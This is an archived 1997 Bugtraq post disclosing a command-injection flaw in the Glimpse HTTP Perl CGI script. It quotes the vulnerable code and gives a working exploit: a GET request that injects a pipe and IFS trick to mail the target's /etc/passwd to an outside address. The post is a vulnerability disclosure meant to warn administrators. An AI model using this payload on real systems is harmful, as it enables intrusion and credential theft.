Bugtraq mailing list archives
Vulnerability in Glimpse HTTP
From: drazvan () kappa ro (Razvan Dragomirescu)
Date: Wed, 2 Jul 1997 19:32:09 +0300
Hi, I'm back with another vulnerability, this time in a small utility: Glimpse HTTP which is an interface to the Glimpse search tool. It is written in PERL. First my congratulations to the authors. They've done a really great job in securing the program (really, I mean it). The hole I exploited is a small one but it can allow you to execute any command on the remote system (as the owner of the http server). Allow me to quote from the source (I'm sure I have the latest version, I downloaded it 1 hour ago :) ). --begin-- $path_info = $ENV{'PATH_INFO'}; $_ = $path_info; # /<length>/$indexdir/$path is the format of the PATH_INFO # might as well start the message now print "Content-type: text/html\n\n"; print "<HTML>\n"; print "<HEAD>\n"; if ( m|^/([0-9]*)(.*)$| ) { $length = $1; $path = $2; $path =~ s|"||g; } else { &err_badargs; } $indexdir = substr($path,0,$length); $relpath = substr($path,$length,length($path)); # print "<br>indexdir=$indexdir<br>relpath=$relpath<br>"; open(CONF,"$indexdir/archive.cfg") || &err_conf; --end-- As you may see, it splits PATH_INFO in two fields: $length and $path and then takes the first $length characters from $path and puts them in $indexdir (my phrasing is more twisted than my mind :) ). The last line opens "$indexdir/archive.cfg". Now for the evil part. By setting $indexdir to a string that begins with '|', the system will execute whatever it finds after the pipe, giving it as STDIN what you write to the CONF handle. The bad thing is that most HTTP servers won't let you use TABS or SPACES in the PATH_INFO (not the case of Netscape servers anyway, but CERN and Apache will do it). And I don't know how many "one word" commands can anyone find (and make them do evil). Here's where the famous IFS variable comes handy. If $indexdir is set to something like "|IFS=5;CMD=5mail5drazvan\@pop3.kappa.ro\</etc/passwd;eval$CMD;echo" it will execute the command in CMD using IFS as separator. The one above sends me your /etc/passwd (so you'd better change something there :) ). The last "echo" is used to ignore the rest of the string. An of course you can use any other separator instead of "5". Now for the exploit. telnet target.machine.com 80 GET /cgi-bin/aglimpse/80|IFS=5;CMD=5mail5drazvan\@pop3.kappa.ro\</etc/passwd;eval$CMD;echo HTTP/1.0 Note that the cgi-bin directory could be located somewhere else (for example in /scripts or /cgi or a special directory just for glimpse...). Also note that you HAVE to use all those backslahes in the command (perl wants them there!). I would like (again) to have some feedback from those who have Glimpse installed on their systems. It should work if the script has not been modified. I think that would be all. Be good. Razvan -- Razvan Dragomirescu drazvan () kappa ro, drazvan () romania ro, drazvan () roedu net Phone: +40-1-6866621 "Smile, tomorrow will be worse" (Murphy)
Current thread:
- Vulnerability in Glimpse HTTP Razvan Dragomirescu (Jul 02)
- Re: Vulnerability in Glimpse HTTP Brian Gentry (Jul 02)
- Re: Vulnerability in Glimpse HTTP Jean-Christophe Touvet (Jul 03)
- Re: Vulnerability in Glimpse HTTP Paul Phillips (Jul 08)
- Re: Vulnerability in Glimpse HTTP Oliver Friedrichs (Jul 09)
- CERT Vendor-Initiated Bulletin VB-97.05 - Vul in Lynx Temporary Nicolas Dubee (Jan 01)
- Re: Vulnerability in Glimpse HTTP Martin Pool (Jul 10)
- It's not over yet. Aleph One (Jul 11)
- It's not over yet. Manley, Jim W (Jul 11)
- More information about JavaScript bug Dominick Matthias PN OIL 6 (Jul 11)
- new post SP3 hotfix: lm-fix Alex Libenson (Jul 12)
- Re: Vulnerability in Glimpse HTTP Brian Gentry (Jul 02)